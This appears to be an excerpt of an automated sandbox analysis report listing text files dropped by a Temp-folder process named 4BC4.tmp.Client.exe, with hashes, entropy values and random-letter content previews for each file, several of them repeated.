                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:KATAXZVCPSXDNCRGTIEAHLTBMQUFAYSWEMLQOMHMIKPDECBCOYPMSTTHHPDKZNGFGWCNUUGIGXPEBWCPRKDGBOWPSNMTFYIHVYITPQGJYFOAJMWVQDHVSMYHPXFGNOURBBIVVVMRPWBBLQXUCAXUFAYRSTCKWXAAMKJJZILVYZNBPSMXAGXZDASFVGKBTHNGETLQIHPRIVPIVHVCSRDUBEGENZMHSYQLROJPZILEYZIFDADQNRGHABZNQMPQMEVKVERETAQUHUXWKYTSUKUXMTSIPUXJRNZOLPGLRSFBCHYWGMRDPLBUIIFHFUNFWRALBUPZLDJUHIMNWKMISYIKAQGSLGBWBFUXASKUFXDTLJAXOSBBQTQJNJAVJQLQEFEKRWWXRJNJSWYQQKPEAVJRUZGKJUAZLPHMOTXLNXAZINYPNPZNGRMVYVCYPPHKTYJCBWNURXFTCITKLDRSFMIHFZHIDPGLOTHCQFZZEHIEXWNNZRJQLWYMVUHTXHFFDTYBHDRBRNTPLBXPVFCUVAJOYOWRENFUXTSCNCCQJOSITCFTGJHFQCYISKUAVSRYASWVJRDNOYYCSYOZWHRPNSBWMHUUEYUGOXVSYKLFZAUQJZDVBEBHHGXQHZVJWNUGLSAYWIEHAJCPIOHOPCXKNVRISBGUAEMSYEGNPQXITRIIMXOLIJYUBIEQGZQUAHRWMKQHCRHKBJZQQXFYTNBHEJEWRPZRXZCXRJQVIUOATJAEYDILREREDIWFEMISEKZWNCDTIPTTOZXOZJIYMGKYIKXBLURVWBJHYFJCLGVVIMADULTTVZIOEIPMVJAOPSQCDFMYPSPGLBIQXTWTUZERGBDTCIRRVRTNGENXXRTHESXQFUQSRGUQDQWGTGXTSGDYWIQVOKABAIAJIEUVYCZXNYVKPRREMYAVDFDHWOGEKALUPBHOHENIHLFJZAHVTJIQJBKXOYIOELCIIECJBPTTASBEKGOESRDFBACPOTNMRZOG
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1026
                                                                                                                                                                                                                                Entropy (8bit):4.694982189683734
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24:MggAXr5945qa/jgwHvsjCIShLGmTSIp/6co4rHg+X:MgJXr5+pjBsUhJTSIGA
                                                                                                                                                                                                                                MD5:E49F84B05A175C231342E6B705A24A44
                                                                                                                                                                                                                                SHA1:41B4E74B5F82D72435DFF38DD1B8B6026691CB4E
                                                                                                                                                                                                                                SHA-256:EE0E867E83FE0206F33F009F216D2986AE3903B6F8944FBE2CC36586E5844626
                                                                                                                                                                                                                                SHA-512:84E29127671A2D2539F2E340C3465736F68C5545A256F9C2813B6BF955645A629FD80BCFF7CEC902F07492C1E40C0794C2D3A906DD402BACA5E647BDFA2B88AA
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:KZWFNRXYKIQQDFEFEKFUFTLSCHHVHHFJVLINSSPODUWFGYCFXENRRFQZQNVRFJLXTKRPVZFZUDBIVIHPJCTZSMJNOWNCQAPYYHLTMHJJYECMUWUKYXMYBEVYHAFCNHVTPHXQKEQMWLDZKOKDMDUORJRRWKHVJLZNSFERFDAFUHPRYSOCWFZCHPEXICNDGFOZLLLNASUKYIOHUBCGSHVHTAAMQFTBUNSBDIPJOCUDVCBYOUPDCATAMJESONSVVDFARQOQHDTKDRVDWNHMPSWQTCDBOSQIMASLDMFOKOIPUFJNASKNMQOVCYYFVCKNWJBVIBCWMYJGLWMAZWJABPWRYFHPZVZTRFLFKJIVQMYASPFSBODYXKEEFHBTFSHZEWSGAGGMSRRYSACIWVPBTHVGVVYONDRAYVOWBYTTLWWPGWQAJDLYFDALUZCIBUOEBMSCKJILYNBNADCKXDVTLOFEMKULPCSYYTTPBZKLBPMPEQZHPJCMRWISRYUKSYBUOCFXUPORADUTYINWCOLTVNYNBVHTATWIAMJBNCYZTMQLJOZXQMVQWJAGLZBDTPNMMKABCUCOYDSRVMYDKVJFRZRLIKSQNEMHUWIXWIACERSGEBQFEQJLXFLCITYZWKHIASCUIPVHOXQGWHFWSXEHOMVVXNFDEKOTOBBAEPJTBOCEJGWYSJBHWDRPPONMLWEDWWLGQVWLLREHLEZFZNEDNRDQMBTZWCUIFLPBHTTQGIEVFRJKMYLHMYUOCAAUGIRMYSCUPKJDFUJBVKKJHICSXHPXWUGXGPHCKBZLZXDCKURFIMZGIDDJWPBHEERWPLLCNTTKZRNYIMGHNYECXBHHHWCVILLPFPVXYOQODPYIIVKTOODIUKCMBBWHUEFORQUJCVYVBOBKKLPQJMOJEUOFUFAAJRTAZTXJJQPOORSRNCQDMHWVYQIGGCMZGYMXIBAKRNOPIPQWJHZEWBBJTYBESJTCCPYZHONYNVOXCBHCXRST
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1026
                                                                                                                                                                                                                                Entropy (8bit):4.687722658485212
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24:gTVIxDsK0PxMQbXpEHH8+976o9VWmCUGGFT3IIU8wyG33bu3jUn:gZIxDW5lj02otC1G5IIUF/n
                                                                                                                                                                                                                                MD5:9A59DF7A478E34FB1DD60514E5C85366
                                                                                                                                                                                                                                SHA1:DE10B95426671A161E37E5CE1AD6424AB3C07D98
                                                                                                                                                                                                                                SHA-256:582393A08E0952F43A544A991772B088CC77CE584F8844DE6C5246BA36E703D5
                                                                                                                                                                                                                                SHA-512:70B4673D358E097AB2B75633A64A19C16E1422C81B6B198D81BF17B7609BFB4ACF5DE36228FF3884C5B9BA0A15E13F56C94968E5136B497C826F3D201A971B00
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:LTKMYBSEYZYLWBDLQYQSGHCEKOMUGSMOJLJVFHAICZAEQCNCBEGUYSPUJHNJSDQTVUPUFCNWSVXGWFVWMFIWRQGVLGYUUBXDZXYJMKPAQTJLYUZTWHPYSRLPQBTKDHEWTTWLDXITQQAGNHQLMCYZCGICKEHUUXVCXHMYJQQYOQIXMRPWDNHFRXHXUHBSJQQHJNETRHWEBONEJBHTDQQNCEMAEDULTTSDIGDGEYCFSHOYFMDRTHCJKCFEFLMLVJNHUTISDTYYKQXVYELRXTCPVMTHGMXSDMUSFEPIIFBHCRRCGWXNWEXQGIUUAYBLCIBZGCXXZYYFPOIAUUAZEORINBBTOZEUXMAZYFVDWGLZZHOHNZHSEJYZULRNGAFKDQXEYHMJWAZXCTSLOIDSVWCDDAJVQOZRXWVWCMYQCKXRQMOHVCMJHXERQTMBGRETHKBIQULAPJVABDGMJDULEZZHMATXEUVKGXGGFBUQPNFRZOPVDFONCFHWZHXDJQQLBBLRNEDPABSGIFBWEQTJAGKFRSLLFIXBIADJYQFXLIYTRHHMHAEDZRJJZZSOCKJNBHWWZEZXGEEJOALVQSBDQTYEHCQVMQMBKNHLBFIRUKLCVRFKGJWGONQGFFIPLGGCUDTZOLCUDDOARJHBVHHRZEYWWKNFEXBVKDTVKTGDMSUOSIIJKKXODRUCUDQHPOJRJZICJUGIDYTFJNVOJIFAVDFPGFTUQFDWLLALACJUWFIKJDQRZQVIIULGPKDOEMRGWVXSLFQHDVZJLHRKVFDXZZCYMKQTRZIBEAHUAXZFKIOBFQACDYLWSHXGVQBAYTXLOISPDOUTEJPQXZNCWCWFKRYQGOEIQEKGUMTCROZMZMVLTCMMBZZHLSYRTDCWSSQEKPTOUQZYPJDCZQTZSHURDOLLYIYFPIECQEHEYPDXHDRIYSOEILWHEODCIXNORCUDGORDQCYVQHNTVIZVMIQLRODCUBWDVZCRJJNXNJQMHPXE
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1026
                                                                                                                                                                                                                                Entropy (8bit):4.690394987545919
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24:x8Xtqp+Wamt5Tlx/0lL5fswH7s9cBus1XuWzv:+tNsfMswbVb+WD
                                                                                                                                                                                                                                MD5:CA901F8E74EB7955CF06A00BD424C0C2
                                                                                                                                                                                                                                SHA1:0876F92A018E8AB57F666FBB048B1CD028607A38
                                                                                                                                                                                                                                SHA-256:6DAB1DF82EDD11EEF4FD3B81E692BF065731935C03D4AAEB4493612188DD1D16
                                                                                                                                                                                                                                SHA-512:7363E62B6FB08E96BD561FA00A05C7A88C0C20943FC3FB9CD505C77CCB40C549F8943DDFCA69532F6544E9CC929EB5786C488F3D7E8F1AB0F05C3EA10E4EA0B2
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:NIKHQAIQAUYLAGKSNVEIEFIHRXSBOKMMEGWDWAKSEZEDBXXYJJOUSSENRJICLDBYWKJEUKRIBTNODZEVLZHOZSPIROLEDDZIVDLRTCVHZIXTARRYNQXDSJTZFOOYHUCROZUVPHMDRIWZWYNOATHQMKGZMPPIBYIAXUSGLYFPQTHUARHNEBTECYTUUCXJOESOPPKVXGBHXGPHIYJEJAYBFOVPMDVWEZNFBQJKZAWGCIWNFBSDPSSBBQTNYDJVQTTPUWPOOTVYKITOESDZWHOTFCZIQUYASDBGWAPMXAFIGQFPGWTRNBMHCXAZNMKIOSHYBMTSDERCDBFQSLEBTIGMCRUGZJZQAMYIFXIHLBUBWXCKIQTVQNMYMUYZWTTRQAVEAQFTTDTEFYTIXVPFUZALHHYLJHLNOFTPHODDWSFLBPCVKNDNFYPRHRVBHZSKKAJYBRTRWEHCIAZYAWYXGIRJSURFADGDZBTKMLEAYICWBYEAKNBIIDMQKZIXOLIQHETRIJJOSQDVZXKTZOMXOXGKIEJJNUHMCNVBNTYVETDBZHKYQLQYJBSUUNGMIURLIIINJAVXYNHTVSYTVBSAGNGQGUYADHTCDXNDKQFKCMHFRLWQZMSHDZEBEGPOSOPFUUHIVYBVXTLHFYHMHALQHNIUKMTKRBYZDOEALSNTXJRYMEETOQRISFEOVJSBVNMZFHXIDWOPIZKHISVTXVHAUPHEUOQLFVPNKREKEFDTLOWUVDKPDDCBKKSSGLLJSGVCAKVVFFKUKYVELNQTKZZRSDNEKDHUGDQWFBGFQMTINSXDOXPQOPZWHRDBBIZNGWLXSHCGVIBTIQEUTFYRIYKHRANDXVFREQPDFPRAKAFCQSRGTEIQGEAVDTJRESPBHYVTTLHWYQSKOZIBJZRSUJETZFCGMBHNYUSWWAENDXQUJFMLWZXGNLDFLSRZJBBJCPWKHFZXEVBDCLKULDSDXUFVEWFBMUMFQQONCJFFBARKNAVJ
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1026
                                                                                                                                                                                                                                Entropy (8bit):4.696250160603532
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24:5Gvoddnzj/gxR0e7uyJ9MLyy07KpRnPgNcnA+2/nSgTfK0Xzy:wv4zCR0ouAMG3wPgNuAZnSQXzy
                                                                                                                                                                                                                                MD5:2B6A90B7D410E3A4E2B32C90D816B4FE
                                                                                                                                                                                                                                SHA1:B8CD90C4CDCF41CBF18D88A4C01BBA22F670AD83
                                                                                                                                                                                                                                SHA-256:D65D483904467EB7373EDA8DFAE2070C057FC93465A4AC5C9FEF8B42340D9DAB
                                                                                                                                                                                                                                SHA-512:03AFBF42E5C04E928D03C687B0F17A0AB15428C78958B206DC6C50118B961C9DDF88A6E53B3115F09FDEE44EAFA46B262933164055532D3B4B4F9265F42A6C58
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:NWTVCDUMOBTPRQQPHXQLIMGPJXTEMPBNYLBFKQFUEVGISJSVQRMPMZSAYEYQSOTUAJFILXLTKFEVHLSAMYEEFLNJSHLTTFXRTDNUGXEFIGVCAWPMDNUICDIZGPHMESKWSMUPNOFEVXFTSHSKLCVHQTNKDHDMDRJOUTEUSCAUAVMVBMOSYKKRPPZYFUGXFXWMWRACKFCQOUHITLUCHGFZEOIPNCJFJOVBZIKDRNERXOSPKSRMHKTJUGFEOONFWLVNTJWXUFPADWYIUDKAZQXCZRFPUQQAMRTIOEHUDTLGOWYMIDOZAXTLGVEGUCQLJZGMIEQYOLWEMSGZUBWXOIBQEMQLQVGRBTUICFCEJGFTZRZCKJQEMATEONIMJKBYGQYDYXOLLROWXGYCNCVPTMRZSMMSZXKMNPSCJJJKKNRAJXGSLZNKJRJRGMCCCBCIGTLTFKNVDVIHYLGRNXDVIVWBCPNKNIFJAPQQWDQQEDDKNHVJRQJTKCUADORWREEDYTVFAOWHPNXWSNAJCVXCLLTNQPMJQHDILFNQUZJZZJJMMNDNGEBEGSTVAGZJMSMZHWJKNIAFGBUYMVADKCVLDGFQETUZXGUOUWXBBPNOWFERKMKMPOXIOTKJERPVXJGCIUKAGDGITLFYRIBAPKRESMNOMTVTZCXMODUUIGFMEMBMGAGXFZGAAZFCXDWBKKCPUKFFNMVKDFFVZYWKEKBWMADWDZXUIOOLCLIACESGRBJRSMXKUSOKXJEICCPRFWSISDTKVTDVAYSWLRHTWJGCXQMNITQJHCBMSCDRWKMGADWILLATOPVPILEQQGAIPRRUCJFTRRSSWITQKIWJOATZOBETZDBBWAIJIOXCUQSILQHQKEZXWFWWNVEWKZCGFYPBDSDBSFAZDZFRHJBZIGOZCVUGODUTNCDHKKMFHSYKUSFSXOMOUXZYOSUZNJQBXAVPOBTVBINMSIPYONLYRKIHONKWHSUAJWIALOTZAQJSNTIH
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1026
                                                                                                                                                                                                                                Entropy (8bit):4.699434772658264
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24:Khfv+VFngw6i0t5Ut+l3kHwMDkhBlBAMFPxYaija:pvl6Pt5uQ3kQ0khBl1VxYpu
                                                                                                                                                                                                                                MD5:02D3A9BE2018CD12945C5969F383EF4A
                                                                                                                                                                                                                                SHA1:085F3165672114B2B8E9F73C629ADABBF99F178D
                                                                                                                                                                                                                                SHA-256:6088E17DB4C586F5011BC5E16E8BF2E79C496EB6DAE177FF64D9713D39D500CA
                                                                                                                                                                                                                                SHA-512:A126D98EE751D0FB768E4DB7D92CBC6AE7852FEE337B85ED045D871DB321C6C98FD58A244D058CA3F41348216C68CB4A37FA854980BB16D358AA62A932DD867E
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:ONBQCLYSPUBDAQCIGYNWXHPENQNLJZGXCHXSNXZNCZBUHYDXPEMCJPAWYQSVHMGKHJUFFFYDAXDAHOLOAZEPTWZTWDGPFLXMMCXLCIIJOXMVRNMUMTICVHQSWNAGIYCQBOZZHONWWBXKDUJYBRPSLNFGTUIFTNGJEATOXKHEFMERAQZVBMQGKZUKXDBMGRJDOOGATZZKQMEZJRWZVAZRPQTVWPETCIMLPMYNWZLVLXRPUUKLNIMTYDNYIJTZEFJDNMWTOFFKRRINCRDCFGJAJNMYQHGXGVHVYPEUFBNUIGUVGBYQKIAJLIVACVIHEGZIYKSROURNGZSCTUKBKFFCGPXAONPDEBIZJRKCFYHATDXLXYKGLWXBCHJERCRNMKESIMBDNPMPBWXSVSEAAUEKEGUIJBZLAESAFZHMBLPPKMNTZAZIIYSHMWJBFTZZSKYNFJYSBRLGVHOWZUQHXUSSJESIEKHZLTLILMSMJZHXFWGJQNWQCDLXEWBZPGBTVDVCPPUFLFGNZRUKJOANJVXVTXLOQLFUIVEWTCBKOBYZMAOTIMQMJYRYLSOLSSACCLCFTVXCKKJDNWQAETNXHIOQCDTXLLVEQLNLGDIOULNFNNDXTVYYSPDWWZHDSYHBRXMUAAHJIGSGLSFKCGADPUAASYZFEZWHYDLQDUCHJXMNMTNCDCMNIJQCSGEQOGVGYBYPMTZBBFOACZMMKVFNELOMGSTCQUDRFKLFGOHOTZKZCWJWDRECGYETFYOWLYECGICMGUKZRVNHUQTLQLHUTPRZXBVYMPAFBLSWKSSKBGWCWBFEEZIAZUZGEYMYBSXYUCHEALFJRSGWQJMABNQHSZANDDTYMVJKXFFFDEENZAGRGVLHFELVOSGTXVOOPFGCQDSFWOYKKOYUHFWMXWPLHFIIPORMEJNOFYMJRBAZLYTIOKEFIWPDZUKMIWKLZXBOESUCXZXQSCMQKDKFBCHJMPMZHELLNSYYEJNBRRXVBMPD
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1026
                                                                                                                                                                                                                                Entropy (8bit):4.699434772658264
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24:Khfv+VFngw6i0t5Ut+l3kHwMDkhBlBAMFPxYaija:pvl6Pt5uQ3kQ0khBl1VxYpu
                                                                                                                                                                                                                                MD5:02D3A9BE2018CD12945C5969F383EF4A
                                                                                                                                                                                                                                SHA1:085F3165672114B2B8E9F73C629ADABBF99F178D
                                                                                                                                                                                                                                SHA-256:6088E17DB4C586F5011BC5E16E8BF2E79C496EB6DAE177FF64D9713D39D500CA
                                                                                                                                                                                                                                SHA-512:A126D98EE751D0FB768E4DB7D92CBC6AE7852FEE337B85ED045D871DB321C6C98FD58A244D058CA3F41348216C68CB4A37FA854980BB16D358AA62A932DD867E
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:ONBQCLYSPUBDAQCIGYNWXHPENQNLJZGXCHXSNXZNCZBUHYDXPEMCJPAWYQSVHMGKHJUFFFYDAXDAHOLOAZEPTWZTWDGPFLXMMCXLCIIJOXMVRNMUMTICVHQSWNAGIYCQBOZZHONWWBXKDUJYBRPSLNFGTUIFTNGJEATOXKHEFMERAQZVBMQGKZUKXDBMGRJDOOGATZZKQMEZJRWZVAZRPQTVWPETCIMLPMYNWZLVLXRPUUKLNIMTYDNYIJTZEFJDNMWTOFFKRRINCRDCFGJAJNMYQHGXGVHVYPEUFBNUIGUVGBYQKIAJLIVACVIHEGZIYKSROURNGZSCTUKBKFFCGPXAONPDEBIZJRKCFYHATDXLXYKGLWXBCHJERCRNMKESIMBDNPMPBWXSVSEAAUEKEGUIJBZLAESAFZHMBLPPKMNTZAZIIYSHMWJBFTZZSKYNFJYSBRLGVHOWZUQHXUSSJESIEKHZLTLILMSMJZHXFWGJQNWQCDLXEWBZPGBTVDVCPPUFLFGNZRUKJOANJVXVTXLOQLFUIVEWTCBKOBYZMAOTIMQMJYRYLSOLSSACCLCFTVXCKKJDNWQAETNXHIOQCDTXLLVEQLNLGDIOULNFNNDXTVYYSPDWWZHDSYHBRXMUAAHJIGSGLSFKCGADPUAASYZFEZWHYDLQDUCHJXMNMTNCDCMNIJQCSGEQOGVGYBYPMTZBBFOACZMMKVFNELOMGSTCQUDRFKLFGOHOTZKZCWJWDRECGYETFYOWLYECGICMGUKZRVNHUQTLQLHUTPRZXBVYMPAFBLSWKSSKBGWCWBFEEZIAZUZGEYMYBSXYUCHEALFJRSGWQJMABNQHSZANDDTYMVJKXFFFDEENZAGRGVLHFELVOSGTXVOOPFGCQDSFWOYKKOYUHFWMXWPLHFIIPORMEJNOFYMJRBAZLYTIOKEFIWPDZUKMIWKLZXBOESUCXZXQSCMQKDKFBCHJMPMZHELLNSYYEJNBRRXVBMPD
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1026
                                                                                                                                                                                                                                Entropy (8bit):4.692693183518806
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24:FrPOQ32qakAnGkyNl2g/fQJnKVOvsyX1aZKx1aHEg:53Sq9/fiK4XQfHEg
                                                                                                                                                                                                                                MD5:78F042E25B7FAF970F75DFAA81955268
                                                                                                                                                                                                                                SHA1:F7C4C8DDF51B3C5293E0A92F6767D308BBF568B4
                                                                                                                                                                                                                                SHA-256:E4C9709AFEA9D9830CED1AA6DF1711D0332A5972688640368DDC32C07C0D5D17
                                                                                                                                                                                                                                SHA-512:CE2548833F62C549CA0268BE445E517AC986CA44EA52916A153DFFE4D7FA59B703E5927DFE70836E8B082C246793DF2066D72DB4A6E1C948940E88C524952348
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:HTAGVDFUIELGZFCTZZGRSQISCXMOKSCAZEJVAPBPJKABIZKEGFAGMGOIUPHPJOYIWMVIKWCNUOWDMGCFXJQANMMOULIVTQQGUZVVOLZWBYTHYOHMMVIMTTBBCAIGONNRVEUMTCTCEMTWFNDSQPHEPLAFZAKYSROZKRQDUZOUZIKJGJRIBJODHOULJHWQBIJSAIYMXLFOSFOEFKTQPEEWFTFCIFSLHXSXYXBWTPCWMCGPETOSVLNKYCONFWCIUFEQKOWQNQKJSIZKNZXOQWMTJOGWDBUFBKDXUPYYIXUTOPSOVWLVKIOKFPSXDAVMBUZIYYZUQTDLZIMRRGXLTOEJMFWLOMNPNLICPZPKTHPXELGBYTJLOJOEWNRDNMXXRYMAJBWCTNMBREIJDVVIXEHEGYQKZQCGLVHOCMUSKXCQQMURLYKWUIUMFSGYMZUQXCTZOKQYXJAUDEVTSOOQUKZKKEEOANGSIIWTUVEGHTCOTXCDTCZIFUAWDLWKDNQTUAXBCRBKEGHCEPWTXOQVBWKIXLQEUCHHRHMKWOVVBFOLNUHSLLMHOOFDQCOVQVCNKKYOGNPYFHMPHXNPOTANYIGKSXGYDKBAEAYCNSDEQRTDZXKUOIUOHOMJPCCDXHJTXLKPCLAKLUNDAFZVUXKBSBAWUIBEQFANHTKLDXHBVLMBIXZUPHFUIHTECGPPEITWIRPTQHJDDRMAQERQMDOELBOQSEMMMCCUPQVDZXOFFYQSEIDXDPFNKRGYVUDDHHQGPRFUFAJOKTJSGMHWRXPZFPTHUACEOFEZUYOSJGJLFUTHTDWBPUETPFOWWTNVGDPCHGGCYSORPYRNRZVFDIQZLGVXSZLKMPDVKQURMLSZDDXVNBPXKBLQIKBTAWLYTZWTFUNWLSZPWUWBVBXUJMBCFHPMBIRGLQAWDQTJEHKOGMUTEILXROVHXNUORTTYMCMDGNZYCCCTIABCKYPUCGPPUUSBWLIPYZKIMRHFVZCGDPKZ
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1026
                                                                                                                                                                                                                                Entropy (8bit):4.687722658485212
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24:gTVIxDsK0PxMQbXpEHH8+976o9VWmCUGGFT3IIU8wyG33bu3jUn:gZIxDW5lj02otC1G5IIUF/n
                                                                                                                                                                                                                                MD5:9A59DF7A478E34FB1DD60514E5C85366
                                                                                                                                                                                                                                SHA1:DE10B95426671A161E37E5CE1AD6424AB3C07D98
                                                                                                                                                                                                                                SHA-256:582393A08E0952F43A544A991772B088CC77CE584F8844DE6C5246BA36E703D5
                                                                                                                                                                                                                                SHA-512:70B4673D358E097AB2B75633A64A19C16E1422C81B6B198D81BF17B7609BFB4ACF5DE36228FF3884C5B9BA0A15E13F56C94968E5136B497C826F3D201A971B00
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:LTKMYBSEYZYLWBDLQYQSGHCEKOMUGSMOJLJVFHAICZAEQCNCBEGUYSPUJHNJSDQTVUPUFCNWSVXGWFVWMFIWRQGVLGYUUBXDZXYJMKPAQTJLYUZTWHPYSRLPQBTKDHEWTTWLDXITQQAGNHQLMCYZCGICKEHUUXVCXHMYJQQYOQIXMRPWDNHFRXHXUHBSJQQHJNETRHWEBONEJBHTDQQNCEMAEDULTTSDIGDGEYCFSHOYFMDRTHCJKCFEFLMLVJNHUTISDTYYKQXVYELRXTCPVMTHGMXSDMUSFEPIIFBHCRRCGWXNWEXQGIUUAYBLCIBZGCXXZYYFPOIAUUAZEORINBBTOZEUXMAZYFVDWGLZZHOHNZHSEJYZULRNGAFKDQXEYHMJWAZXCTSLOIDSVWCDDAJVQOZRXWVWCMYQCKXRQMOHVCMJHXERQTMBGRETHKBIQULAPJVABDGMJDULEZZHMATXEUVKGXGGFBUQPNFRZOPVDFONCFHWZHXDJQQLBBLRNEDPABSGIFBWEQTJAGKFRSLLFIXBIADJYQFXLIYTRHHMHAEDZRJJZZSOCKJNBHWWZEZXGEEJOALVQSBDQTYEHCQVMQMBKNHLBFIRUKLCVRFKGJWGONQGFFIPLGGCUDTZOLCUDDOARJHBVHHRZEYWWKNFEXBVKDTVKTGDMSUOSIIJKKXODRUCUDQHPOJRJZICJUGIDYTFJNVOJIFAVDFPGFTUQFDWLLALACJUWFIKJDQRZQVIIULGPKDOEMRGWVXSLFQHDVZJLHRKVFDXZZCYMKQTRZIBEAHUAXZFKIOBFQACDYLWSHXGVQBAYTXLOISPDOUTEJPQXZNCWCWFKRYQGOEIQEKGUMTCROZMZMVLTCMMBZZHLSYRTDCWSSQEKPTOUQZYPJDCZQTZSHURDOLLYIYFPIECQEHEYPDXHDRIYSOEILWHEODCIXNORCUDGORDQCYVQHNTVIZVMIQLRODCUBWDVZCRJJNXNJQMHPXE
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1026
                                                                                                                                                                                                                                Entropy (8bit):4.699434772658264
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24:Khfv+VFngw6i0t5Ut+l3kHwMDkhBlBAMFPxYaija:pvl6Pt5uQ3kQ0khBl1VxYpu
                                                                                                                                                                                                                                MD5:02D3A9BE2018CD12945C5969F383EF4A
                                                                                                                                                                                                                                SHA1:085F3165672114B2B8E9F73C629ADABBF99F178D
                                                                                                                                                                                                                                SHA-256:6088E17DB4C586F5011BC5E16E8BF2E79C496EB6DAE177FF64D9713D39D500CA
                                                                                                                                                                                                                                SHA-512:A126D98EE751D0FB768E4DB7D92CBC6AE7852FEE337B85ED045D871DB321C6C98FD58A244D058CA3F41348216C68CB4A37FA854980BB16D358AA62A932DD867E
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
